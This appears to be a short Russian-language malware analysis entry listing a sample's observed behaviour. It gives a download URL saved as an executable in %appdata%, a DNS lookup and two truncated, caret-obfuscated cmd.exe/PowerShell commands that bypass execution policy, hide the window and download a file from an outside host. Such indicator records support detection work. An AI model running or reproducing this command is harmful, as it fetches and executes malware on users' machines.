Техническая информация
- http://sutraponef.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PoWER^sh^El^L.EX^e ^-^Ex^EcUti^O^np^OLICY^ ^BYPAss -n^O^P^Ro^F^ILE ^-Wi^N^d^oWS^T^Y^l^e^ ^hi^d^d^En (^N^e^W^-O^BjE^ct SyS^T^Em.^NET^.^weB^clIENT)^.^DOw^nL^Oa^dFI^Le(^'http://sutr...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /c "PoWER^sh^El^L.EX^e ^-^Ex^EcUti^O^np^OLICY^ ^BYPAss -n^O^P^Ro^F^ILE ^-Wi^N^d^oWS^T^Y^l^e^ ^hi^d^d^En (^N^e^W^-O^BjE^ct SyS^T^Em.^NET^.^weB^clIENT)^.^DOw^nL^Oa^dFI^Le(^'http://sutr...' (со скрытым окном)